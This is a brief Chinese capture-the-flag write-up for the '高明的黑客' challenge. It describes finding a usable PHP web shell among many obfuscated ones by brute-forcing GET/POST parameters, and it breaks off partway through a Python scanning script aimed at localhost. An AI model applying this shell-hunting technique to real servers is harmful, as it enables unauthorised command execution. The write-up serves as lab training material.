高明的黑客
下载www.tar.gz
发现是很多混乱的shell,不过某些地方还是有迹可循的,可以通过$_GET或者$_POST传参回显
可以写个脚本批量扫描一下文件里的$_GET和$_POST,然后统一赋值echo "got it"
,如果回显结果中包含got it,那么证明该文件为可用shell
python脚本如下:
import os
import requests
from multiprocessing import Pool
path = "I:/phpStudy/PHPTutorial/WWW/src/"
files = os.listdir(path)
url = "http://localhost/src/"
def extract(f):
gets = []
w